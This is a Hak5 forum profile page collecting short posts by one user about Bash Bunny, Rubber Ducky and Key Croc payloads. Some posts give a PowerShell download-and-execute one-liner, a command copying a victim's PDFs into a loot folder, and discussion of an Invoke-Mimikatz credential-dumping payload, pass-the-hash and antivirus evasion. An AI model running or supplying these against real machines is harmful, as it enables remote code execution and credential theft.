Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by kuyaya

  1. Yeah but you will learn a lot more if you do it by yourself. So you just need to backup the Documents folder with its subfolders?
  2. kuyaya

    file location

    hey, first you need to mount /dev/nandf to /root/udisk: mount -o sync /dev/nandf /root/udisk/ then you can cd into /root/udisk and you can see the filesystem you usually see when you plug it in during arming mode 👍
  3. This should work (haven't tested it, but it should work) Q STRING find ./Dropbox -name '*.pdf' -exec scp '{}' /Volumes/BashBunny/$lootdir/docs/ \;
  4. Hey Dave-ee, I'd like to correct a small snipped you posted here. It's not iex ((New ObjectNet.WebClient).DownloadString($url)) but rather iex (New-Object Net.WebClient).DownloadString($url) or IEX([Net.Webclient]::new().DownloadString($url)) People may get confused if it doesn't work so I just thought I'll post this here.
  5. Well, there could also be the possibility that the people simply didn't know what to reply, didn't have time...idk man. It also seems like a really neat idea to me. You just seem like a really awesome person and I really recommend Discord if you want to have active responses. Well, the Hak5 discord server is quite active, but it's really not like there are constantly messages falling in, so you don't have to worry about reading too slow. There are obviously discord servers out there where you can't keep up with reading, but the Hak5 server isn't one of 'em. So...yeah. Hope to see you there. Otherwise, I'll stay here aswell obviously, so we'll see each other again anyways.
  6. Well, that could be because the forum isn't as active as it used to be. Check out the Hak5 Discord, people are quite active there (me included) 🙂
  7. sounds interesting, never heard of it
  8. kuyaya

    Keycroc Issues

    Did it record nothing at all or is the croc_raw.log present?
  9. It's literally the first topic in the BashBunny section
  10. Depends on what you want to do If I had to choose, I'd get the croc
  11. A broken harddrive is different from a locked phone, I'd rather compare a locked phone with a locked harddrive (e.g. with bitlocker) The police sure can pull the data from the phone, however they probably won't do this with a rubber ducky/bash bunny. A harddrive, if protected good enough, is not recoverable (imo).
  12. In the your payload.txt, put DUCKY_LANG es
  13. I agree with Bob123. I don't see them as out-of-the-box payloads, but more as templates. You need to adjust them to your own machine/scenario
  14. You cannot do such things with a rubber ducky unless you know the pattern/pin. The best thing you can do is: 1. If you have an android, try using google's phone recovery service. If you logged in with your google account on your android you should be able to recover your files. 2. If you have an apple phone, try using apple's phone recovery service. If you logged in with your appleID/iCloud on your iOS phone you should be able to recover your files.
  15. Yes, from the BashBunny. There is however something called the "twinduck" firmware, which is however not supported or maintained, it's a community project. The BashBunny can act as 1. Mass storage 2. RNDIS_Ethernet, ECM_Ethernet 3. HID (keyboard) 4. Serial The RubberDucky only acts as a 1. HID (keyboard) So I'd go for the bunny
  16. Probably not by default. You'd have to obfuscate it first.
  17. Uhm, the Hak5 shop stopped selling it like 8 weeks ago. It's not "a few days". It's totally possible that their stock got also sold out after 8 weeks, especially when people realise it's not fabricated anymore. I don't think that there are "dangerous hacking features" that they are afraid of "us" finding about. Sounds a bit like a conspiracy theory. I mean, if it had those dangerous features, they could sell more of them, which would make them more money. So I don't think that's the case. Maybe it just wasn't worth it anymore producing it.
  18. Yes it only does output windows passwords. I know that this is not from the browser, but if you have outlook installed (the app) and click on "remember my login", it will get it in plaintext. So you could just download the app, set it up for your fake gmail account and it should work. Or what would also be interesting, is that you could try to then use Pass the Hash (with the hash you got from Mimikatz) and get remote access with that. Does the Mimikatz, which I sent you, work?
  19. Finished with the whole Invoke-Mimikatz payload 🙂 However, it doesn't save it in a file. It just outputs it to the terminal (powershell). It wouldn't be hard to save it to a file, if you want it that way. Update: It does now save it to a file :).
  20. Okay, so the problem is that LaZagne gets removed by Windows Defender (even if you set exclusions) which pretty much screwed up most of my work on the payload. Maybe the same happens to Garfield, idk. So I assume an Invoke-Mimikatz is also fine? If you have a presentation and you could show it type crypto-stuff and then output mimikatz, that'd be even cooler, right? I'm just gonna work ~15min on the Invoke-Mimikatz one and then send it to you. Of course with the SMBBruteBunny included. Another question: are you gonna show it on a fresh Windows 10 VM with just some passwords on it?
  21. Hm okay, so I've tried to think of a way to achieve this without having to install the app. I thought about a captiveportal which uses javascript to vibrate the phone. However, that's only going to work if the user opens the phone and then the captive portal pops up. Does anyone maybe have an idea?
  • Create New...